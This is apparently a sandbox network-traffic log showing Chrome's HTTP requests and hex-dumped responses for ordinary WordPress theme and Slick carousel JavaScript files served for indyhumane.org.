                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC653INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:12 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 29501
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/themes/thrive-theme/inc/assets/dist/frontend.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Mon, 16 Dec 2024 17:13:47 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: HIT jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC716INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 7b 35 35 36 30 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3b 65 3d 54 68 72 69 76 65 54 68 65 6d 65 2e 24 2c 74 2e 65 78 70 6f 72 74 73 3d 7b 69 73 4f 6e 53 63 72 65 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 5b 22 74 6f 70 22 2c 22 72 69 67 68 74 22 2c 22 62 6f 74 74 6f 6d 22 2c 22 6c 65 66 74 22 5d 3b 74 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 3f 5b 74 5d 3a 74 3b 63 6f 6e 73 74 20 69 3d 65 28 77 69 6e 64 6f 77 29 2c 73 3d 7b 74 6f 70 3a 69 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 2c 6c 65 66 74 3a
                                                                                                                                                                                                                                                        Data Ascii: !function(){var t={5560:function(t){var e;e=ThriveTheme.$,t.exports={isOnScreen:function(){let t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:["top","right","bottom","left"];t="string"==typeof t?[t]:t;const i=e(window),s={top:i.scrollTop(),left:
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 6f 70 7c 7c 73 2e 74 6f 70 3e 6f 2e 62 6f 74 74 6f 6d 29 7d 7d 29 29 2c 6e 7d 7d 7d 2c 35 35 31 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 29 7b 28 65 3d 3e 7b 63 6f 6e 73 74 20 73 3d 69 28 38 39 39 39 29 2c 6f 3d 22 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 22 3b 63 6c 61 73 73 20 6e 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 74 29 7b 74 68 69 73 2e 24 66 6f 72 6d 3d 74 2c 74 68 69 73 2e 61 64 64 45 72 72 6f 72 46 69 65 6c 64 73 28 29 2c 74 68 69 73 2e 24 66 6f 72 6d 2e 73 75 62 6d 69 74 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6e 2e 73 75 62 6d 69 74 41 63 74 69 6f 6e 28 74 2c 65 28 74 68 69 73 29 29 7d 29 29 7d 61 64 64 45 72 72 6f 72 46 69 65 6c 64 73 28 29 7b 74 68 69 73 2e 24 66 6f 72 6d 2e 66 69 6e 64 28 22 3a 69 6e 70 75 74 3a 76 69 73 69 62 6c 65
                                                                                                                                                                                                                                                        Data Ascii: op||s.top>o.bottom)}})),n}}},551:function(t,e,i){(e=>{const s=i(8999),o=".error-message";class n{constructor(t){this.$form=t,this.addErrorFields(),this.$form.submit((function(t){n.submitAction(t,e(this))}))}addErrorFields(){this.$form.find(":input:visible
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 73 2e 24 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 22 61 75 64 69 6f 22 29 2e 65 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 61 75 74 6f 70 6c 61 79 22 29 29 7b 63 6f 6e 73 74 20 74 3d 74 68 69 73 2e 70 6c 61 79 28 29 3b 6e 75 6c 6c 21 3d 3d 74 26 26 74 2e 63 61 74 63 68 28 28 28 29 3d 3e 7b 74 68 69 73 2e 70 6c 61 79 28 29 7d 29 29 7d 7d 29 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 27 69 66 72 61 6d 65 5b 64 61 74 61 2d 70 72 6f 76 69 64 65 72 3d 22 73 6f 75 6e 64 63 6c 6f 75 64 22 5d 5b 64 61 74 61 2d 61 75 74 6f 70 6c 61 79 3d 22 31 22 5d 27 29 2e 65 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 74 3d 74 68 69 73 2e 67 65 74 41 74
                                                                                                                                                                                                                                                        Data Ascii: s.$element.find("audio").each((function(){if(this.hasAttribute("data-autoplay")){const t=this.play();null!==t&&t.catch((()=>{this.play()}))}})),this.$element.find('iframe[data-provider="soundcloud"][data-autoplay="1"]').each((function(){const t=this.getAt
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 3d 3d 65 7c 7c 22 73 65 6c 66 22 3d 3d 3d 65 29 7b 63 6f 6e 73 74 20 65 3d 74 2e 67 65 74 28 30 29 3b 65 2e 6d 75 74 65 64 3d 21 30 2c 65 2e 70 61 75 73 65 64 26 26 65 2e 70 6c 61 79 28 29 7d 72 65 74 75 72 6e 20 74 68 69 73 7d 7d 67 65 74 44 61 74 61 28 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 61 74 74 72 28 60 64 61 74 61 2d 24 7b 74 7d 60 29 7d 73 74 61 74 69 63 20 69 6e 73 74 61 6e 63 65 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 69 28 74 29 7d 7d 74 2e 65 78 70 6f 72 74 73 3d 69 7d 29 28 54 68 72 69 76 65 54 68 65 6d 65 2e 24 29 7d 2c 37 34 33 36 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 28 65 3d 3e 7b 63 6c 61 73 73 20 69 20 65 78 74 65 6e 64 73 20 54 43 42 5f 46 72 6f 6e 74 2e 50 61 67 69 6e 61 74 69 6f 6e 7b 63 6f 6e
                                                                                                                                                                                                                                                        Data Ascii: ==e||"self"===e){const e=t.get(0);e.muted=!0,e.paused&&e.play()}return this}}getData(t){return this.$element.attr(`data-${t}`)}static instance(t){return new i(t)}}t.exports=i})(ThriveTheme.$)},7436:function(t){(e=>{class i extends TCB_Front.Pagination{con
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 73 2e 70 6f 73 74 43 6f 6e 74 65 6e 74 4f 66 66 73 65 74 54 6f 70 3d 74 68 69 73 2e 24 70 6f 73 74 43 6f 6e 74 65 6e 74 2e 6f 66 66 73 65 74 28 29 2e 74 6f 70 2c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 26 26 6e 65 77 20 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 28 74 68 69 73 2e 69 6e 69 74 69 61 6c 53 74 61 74 65 2e 62 69 6e 64 28 74 68 69 73 29 29 2e 6f 62 73 65 72 76 65 28 74 68 69 73 2e 24 70 6f 73 74 43 6f 6e 74 65 6e 74 5b 30 5d 29 2c 74 68 69 73 2e 69 6e 69 74 28 29 29 29 7d 69 6e 69 74 28 29 7b 74 68 69 73 2e 69 6e 69 74 69 61 6c 53 74 61 74 65 28 29 2c 69 2e 74 76 65 5f 66 72 6f 6e 74 65 6e 64 5f 6f 70 74 69 6f 6e 73 2e 69 73 5f 65 64 69 74 6f 72 5f 70 61 67 65 7c 7c 28 74 68 69 73 2e
                                                                                                                                                                                                                                                        Data Ascii: s.postContentOffsetTop=this.$postContent.offset().top,"undefined"!=typeof ResizeObserver&&new ResizeObserver(this.initialState.bind(this)).observe(this.$postContent[0]),this.init()))}init(){this.initialState(),i.tve_frontend_options.is_editor_page||(this.
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 72 2e 63 73 73 28 22 74 6f 70 22 29 29 3e 3d 6e 2e 6f 66 66 73 65 74 28 29 2e 74 6f 70 7d 65 6c 73 65 20 74 3d 30 21 3d 3d 74 68 69 73 2e 73 63 72 6f 6c 6c 54 6f 70 3b 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 22 73 68 6f 77 22 2c 74 29 7d 73 65 74 50 72 6f 67 72 65 73 73 28 74 29 7b 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 61 74 74 72 28 22 76 61 6c 75 65 22 2c 74 29 7d 73 65 74 43 6f 75 6e 74 64 6f 77 6e 28 74 29 7b 69 66 28 74 68 69 73 2e 24 63 6f 75 6e 74 64 6f 77 6e 2e 6c 65 6e 67 74 68 29 7b 63 6f 6e 73 74 20 65 3d 30 3d 3d 3d 74 3f 74 68 69 73 2e 74 6f 74 61 6c 4d 69 6e 75 74 65 73 3a 74 68 69 73 2e 74 6f 74 61 6c 4d 69 6e 75 74 65 73 2d 4d 61 74 68 2e 66 6c 6f 6f 72 28 74 68 69 73 2e 74 6f 74 61 6c 4d 69 6e 75
                                                                                                                                                                                                                                                        Data Ascii: r.css("top"))>=n.offset().top}else t=0!==this.scrollTop;this.$element.toggleClass("show",t)}setProgress(t){this.$element.attr("value",t)}setCountdown(t){if(this.$countdown.length){const e=0===t?this.totalMinutes:this.totalMinutes-Math.floor(this.totalMinu
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 22 22 29 7b 63 61 73 65 22 73 74 69 63 6b 79 22 3a 74 3d 72 2e 64 65 66 61 75 6c 74 53 65 74 74 69 6e 67 73 3b 62 72 65 61 6b 3b 63 61 73 65 22 6f 66 66 2d 73 63 72 65 65 6e 22 3a 74 3d 6c 2e 64 65 66 61 75 6c 74 53 65 74 74 69 6e 67 73 3b 62 72 65 61 6b 3b 63 61 73 65 22 64 69 73 70 6c 61 79 2d 74 79 70 65 22 3a 74 3d 7b 64 65 73 6b 74 6f 70 3a 22 6e 6f 72 6d 61 6c 22 7d 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 74 3d 7b 7d 7d 72 65 74 75 72 6e 20 74 7d 73 74 61 74 69 63 20 67 65 74 20 69 6e 45 64 69 74 6f 72 28 29 7b 72 65 74 75 72 6e 21 21 6f 2e 74 76 65 5f 66 72 6f 6e 74 65 6e 64 5f 6f 70 74 69 6f 6e 73 2e 69 73 5f 65 64 69 74 6f 72 5f 70 61 67 65 7d 63 6f 6e 73 74 72 75 63
                                                                                                                                                                                                                                                        Data Ascii: rguments[0]?arguments[0]:""){case"sticky":t=r.defaultSettings;break;case"off-screen":t=l.defaultSettings;break;case"display-type":t={desktop:"normal"};break;default:t={}}return t}static get inEditor(){return!!o.tve_frontend_options.is_editor_page}construc
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 29 7d 63 61 74 63 68 28 65 29 7b 73 3d 61 2e 67 65 74 44 65 66 61 75 6c 74 56 61 6c 75 65 73 28 74 29 7d 72 65 74 75 72 6e 20 65 26 26 28 73 3d 73 5b 65 5d 29 2c 69 26 26 28 73 3d 74 68 69 73 2e 67 65 74 43 6f 6e 66 69 67 42 79 44 65 76 69 63 65 28 73 2c 69 29 29 2c 73 7d 67 65 74 43 6f 6e 66 69 67 42 79 44 65 76 69 63 65 28 74 29 7b 6c 65 74 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 73 2e 67 65 74 44 69 73 70 6c 61 79 54 79 70 65 28 29 3b 63 6f 6e 73 74 20 69 3d 74 68 69 73 2e 67 65 74 44 69 73 70 6c 61 79 54 79 70 65 28 65 29 2c 6f 3d 5b 65 5d 3b 66 6f 72 28 22 6d 6f 62 69 6c 65 22 3d 3d 3d 65 26 26 69 3d 3d 3d 74 68 69 73
                                                                                                                                                                                                                                                        Data Ascii: )}catch(e){s=a.getDefaultValues(t)}return e&&(s=s[e]),i&&(s=this.getConfigByDevice(s,i)),s}getConfigByDevice(t){let e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:s.getDisplayType();const i=this.getDisplayType(e),o=[e];for("mobile"===e&&i===this
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 6e 44 61 74 61 28 22 73 74 69 63 6b 79 22 2c 22 76 69 73 69 62 6c 65 4f 6e 22 29 2e 69 6e 63 6c 75 64 65 73 28 74 29 26 26 28 69 3d 22 73 74 69 63 6b 79 22 29 3a 69 3d 65 5b 74 5d 2c 69 7c 7c 28 69 3d 22 6d 6f 62 69 6c 65 22 3d 3d 3d 74 26 26 65 2e 74 61 62 6c 65 74 3f 65 2e 74 61 62 6c 65 74 3a 65 2e 64 65 73 6b 74 6f 70 29 2c 22 73 74 69 63 6b 79 22 3d 3d 3d 69 26 26 22 6d 6f 62 69 6c 65 22 3d 3d 3d 74 26 26 28 69 3d 22 73 74 69 63 6b 79 22 3d 3d 3d 65 2e 74 61 62 6c 65 74 3f 22 73 74 69 63 6b 79 22 3d 3d 3d 65 2e 64 65 73 6b 74 6f 70 3f 22 6e 6f 72 6d 61 6c 22 3a 65 2e 64 65 73 6b 74 6f 70 3a 65 2e 74 61 62 6c 65 74 29 2c 69 7d 6f 66 66 53 63 72 65 65 6e 52 65 66 72 65 73 68 28 29 7b 6c 65 74 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e
                                                                                                                                                                                                                                                        Data Ascii: nData("sticky","visibleOn").includes(t)&&(i="sticky"):i=e[t],i||(i="mobile"===t&&e.tablet?e.tablet:e.desktop),"sticky"===i&&"mobile"===t&&(i="sticky"===e.tablet?"sticky"===e.desktop?"normal":e.desktop:e.tablet),i}offScreenRefresh(){let t=arguments.length>
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 30 2c 6d 6f 62 69 6c 65 3a 21 31 7d 2c 76 69 73 69 62 6c 65 49 6e 45 64 69 74 6f 72 3a 21 30 2c 68 61 73 4f 76 65 72 6c 61 79 3a 7b 64 65 73 6b 74 6f 70 3a 21 31 7d 2c 68 61 73 44 65 66 61 75 6c 74 54 72 69 67 67 65 72 3a 7b 64 65 73 6b 74 6f 70 3a 21 30 7d 2c 68 61 73 43 6c 6f 73 65 49 63 6f 6e 3a 7b 64 65 73 6b 74 6f 70 3a 21 30 7d 2c 73 69 64 65 62 61 72 57 69 64 74 68 3a 6e 75 6c 6c 2c 74 72 69 67 67 65 72 50 6f 73 69 74 69 6f 6e 3a 7b 64 65 73 6b 74 6f 70 3a 22 63 65 6e 74 65 72 22 7d 2c 63 6f 6c 6c 61 70 73 65 64 49 63 6f 6e 3a 22 69 63 6f 6e 2d 6d 65 6e 75 2d 6c 65 66 74 2d 73 6f 6c 69 64 22 2c 65 78 70 61 6e 64 65 64 49 63 6f 6e 3a 22 69 63 6f 6e 2d 6d 65 6e 75 2d 72 69 67 68 74 2d 73 6f 6c 69 64 22 2c 63 6c 6f 73 65 49 63 6f 6e 3a 22 69 63 6f 6e
                                                                                                                                                                                                                                                        Data Ascii: 0,mobile:!1},visibleInEditor:!0,hasOverlay:{desktop:!1},hasDefaultTrigger:{desktop:!0},hasCloseIcon:{desktop:!0},sidebarWidth:null,triggerPosition:{desktop:"center"},collapsedIcon:"icon-menu-left-solid",expandedIcon:"icon-menu-right-solid",closeIcon:"icon


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        44192.168.2.449794192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC613OUTGET /wp-content/plugins/thrive-visual-editor/editor/js/dist/carousel-libs.min.js?ver=10.4.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC667INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:12 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 43468
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/plugins/thrive-visual-editor/editor/js/dist/carousel-libs.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 01:15:24 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC702INData Raw: 28 28 29 3d 3e 7b 76 61 72 20 69 3d 7b 38 37 30 39 37 3a 28 69 2c 65 2c 74 29 3d 3e 7b 76 61 72 20 6f 2c 73 2c 6e 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 73 3d 5b 74 28 34 31 36 36 39 29 5d 2c 6f 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 65 2c 74 3d 77 69 6e 64 6f 77 2e 53 6c 69 63 6b 7c 7c 7b 7d 3b 28 65 3d 30 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6f 29 7b 76 61 72 20 73 2c 6e 3d 74 68 69 73 3b 6e 2e 64 65 66 61 75 6c 74 73 3d 7b 61 63 63 65 73 73 69 62 69 6c 69 74 79 3a 21 30 2c 61 64 61 70 74 69 76 65 48 65 69 67 68 74 3a 21 31 2c 61 70 70 65 6e 64 41 72 72 6f 77 73 3a 69 28 74 29 2c 61 70 70 65 6e 64 44 6f 74 73 3a 69 28 74 29 2c 61 72 72 6f 77 73 3a 21 30 2c 61 73 4e 61 76 46 6f 72 3a 6e 75 6c 6c 2c
                                                                                                                                                                                                                                                        Data Ascii: (()=>{var i={87097:(i,e,t)=>{var o,s,n;!function(){"use strict";s=[t(41669)],o=function(i){var e,t=window.Slick||{};(e=0,t=function(t,o){var s,n=this;n.defaults={accessibility:!0,adaptiveHeight:!1,appendArrows:i(t),appendDots:i(t),arrows:!0,asNavFor:null,
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 65 3a 21 31 2c 69 6e 66 69 6e 69 74 65 3a 21 30 2c 69 6e 69 74 69 61 6c 53 6c 69 64 65 3a 30 2c 6c 61 7a 79 4c 6f 61 64 3a 22 6f 6e 64 65 6d 61 6e 64 22 2c 6d 6f 62 69 6c 65 46 69 72 73 74 3a 21 31 2c 70 61 75 73 65 4f 6e 48 6f 76 65 72 3a 21 30 2c 70 61 75 73 65 4f 6e 46 6f 63 75 73 3a 21 30 2c 70 61 75 73 65 4f 6e 44 6f 74 73 48 6f 76 65 72 3a 21 31 2c 72 65 73 70 6f 6e 64 54 6f 3a 22 77 69 6e 64 6f 77 22 2c 72 65 73 70 6f 6e 73 69 76 65 3a 6e 75 6c 6c 2c 72 6f 77 73 3a 30 2c 72 74 6c 3a 21 31 2c 73 6c 69 64 65 3a 22 22 2c 73 6c 69 64 65 73 50 65 72 52 6f 77 3a 31 2c 73 6c 69 64 65 73 54 6f 53 68 6f 77 3a 31 2c 73 6c 69 64 65 73 54 6f 53 63 72 6f 6c 6c 3a 31 2c 73 70 65 65 64 3a 35 30 30 2c 73 77 69 70 65 3a 21 30 2c 73 77 69 70 65 54 6f 53 6c 69 64 65
                                                                                                                                                                                                                                                        Data Ascii: e:!1,infinite:!0,initialSlide:0,lazyLoad:"ondemand",mobileFirst:!1,pauseOnHover:!0,pauseOnFocus:!0,pauseOnDotsHover:!1,respondTo:"window",responsive:null,rows:0,rtl:!1,slide:"",slidesPerRow:1,slidesToShow:1,slidesToScroll:1,speed:500,swipe:!0,swipeToSlide
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 65 6e 3d 22 6d 6f 7a 48 69 64 64 65 6e 22 2c 6e 2e 76 69 73 69 62 69 6c 69 74 79 43 68 61 6e 67 65 3d 22 6d 6f 7a 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 29 3a 76 6f 69 64 20 30 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 77 65 62 6b 69 74 48 69 64 64 65 6e 26 26 28 6e 2e 68 69 64 64 65 6e 3d 22 77 65 62 6b 69 74 48 69 64 64 65 6e 22 2c 6e 2e 76 69 73 69 62 69 6c 69 74 79 43 68 61 6e 67 65 3d 22 77 65 62 6b 69 74 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 29 2c 6e 2e 61 75 74 6f 50 6c 61 79 3d 69 2e 70 72 6f 78 79 28 6e 2e 61 75 74 6f 50 6c 61 79 2c 6e 29 2c 6e 2e 61 75 74 6f 50 6c 61 79 43 6c 65 61 72 3d 69 2e 70 72 6f 78 79 28 6e 2e 61 75 74 6f 50 6c 61 79 43 6c 65 61 72 2c 6e 29 2c 6e 2e 61 75 74 6f 50 6c 61 79 49 74 65 72 61 74 6f 72 3d 69
                                                                                                                                                                                                                                                        Data Ascii: en="mozHidden",n.visibilityChange="mozvisibilitychange"):void 0!==document.webkitHidden&&(n.hidden="webkitHidden",n.visibilityChange="webkitvisibilitychange"),n.autoPlay=i.proxy(n.autoPlay,n),n.autoPlayClear=i.proxy(n.autoPlayClear,n),n.autoPlayIterator=i
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 6e 64 65 78 22 2c 65 29 7d 29 29 2c 73 2e 24 73 6c 69 64 65 73 43 61 63 68 65 3d 73 2e 24 73 6c 69 64 65 73 2c 73 2e 72 65 69 6e 69 74 28 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 61 6e 69 6d 61 74 65 48 65 69 67 68 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 3d 74 68 69 73 3b 69 66 28 31 3d 3d 3d 69 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 26 26 21 30 3d 3d 3d 69 2e 6f 70 74 69 6f 6e 73 2e 61 64 61 70 74 69 76 65 48 65 69 67 68 74 26 26 21 31 3d 3d 3d 69 2e 6f 70 74 69 6f 6e 73 2e 76 65 72 74 69 63 61 6c 29 7b 69 2e 24 73 6c 69 64 65 73 2e 65 71 28 69 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 73 6c 69 63 6b 2d 61 63 74 69 76 65 22 29 3b 76 61 72 20 65 3d 69 2e 24 73 6c 69 64 65
                                                                                                                                                                                                                                                        Data Ascii: ndex",e)})),s.$slidesCache=s.$slides,s.reinit()},t.prototype.animateHeight=function(){var i=this;if(1===i.options.slidesToShow&&!0===i.options.adaptiveHeight&&!1===i.options.vertical){i.$slides.eq(i.currentSlide).removeClass("slick-active");var e=i.$slide
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 61 73 4e 61 76 46 6f 72 3b 72 65 74 75 72 6e 20 65 26 26 6e 75 6c 6c 21 3d 3d 65 26 26 28 65 3d 69 28 65 29 2e 6e 6f 74 28 74 68 69 73 2e 24 73 6c 69 64 65 72 29 29 2c 65 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 61 73 4e 61 76 46 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 67 65 74 4e 61 76 54 61 72 67 65 74 28 29 3b 6e 75 6c 6c 21 3d 3d 74 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 74 2e 65 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 69 28 74 68 69 73 29 2e 73 6c 69 63 6b 28 22 67 65 74 53 6c 69 63 6b 22 29 3b 74 2e 75 6e 73 6c 69 63 6b 65 64 7c 7c 74 2e 73 6c 69 64 65 48 61 6e 64 6c 65
                                                                                                                                                                                                                                                        Data Ascii: function(){var e=this.options.asNavFor;return e&&null!==e&&(e=i(e).not(this.$slider)),e},t.prototype.asNavFor=function(e){var t=this.getNavTarget();null!==t&&"object"==typeof t&&t.each((function(){var t=i(this).slick("getSlick");t.unslicked||t.slideHandle
                                                                                                                                                                                                                                                        2025-01-09 01:59:12 UTC1369INData Raw: 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 3f 28 65 2e 24 70 72 65 76 41 72 72 6f 77 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 73 6c 69 63 6b 2d 68 69 64 64 65 6e 22 29 2e 72 65 6d 6f 76 65 41 74 74 72 28 22 61 72 69 61 2d 68 69 64 64 65 6e 20 74 61 62 69 6e 64 65 78 22 29 2c 65 2e 24 6e 65 78 74 41 72 72 6f 77 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 73 6c 69 63 6b 2d 68 69 64 64 65 6e 22 29 2e 72 65 6d 6f 76 65 41 74 74 72 28 22 61 72 69 61 2d 68 69 64 64 65 6e 20 74 61 62 69 6e 64 65 78 22 29 2c 65 2e 68 74 6d 6c 45 78 70 72 2e 74 65 73 74 28 65 2e 6f 70 74 69 6f 6e 73 2e 70 72 65 76 41 72 72 6f 77 29 26 26 65 2e 24 70 72 65 76 41 72 72 6f 77 2e 70 72 65 70 65 6e 64 54 6f 28 65 2e 6f 70 74 69 6f 6e 73 2e 61 70 70 65 6e 64 41 72 72
                                                                                                                                                                                                                                                        Data Ascii: .options.slidesToShow?(e.$prevArrow.removeClass("slick-hidden").removeAttr("aria-hidden tabindex"),e.$nextArrow.removeClass("slick-hidden").removeAttr("aria-hidden tabindex"),e.htmlExpr.test(e.options.prevArrow)&&e.$prevArrow.prependTo(e.options.appendArr
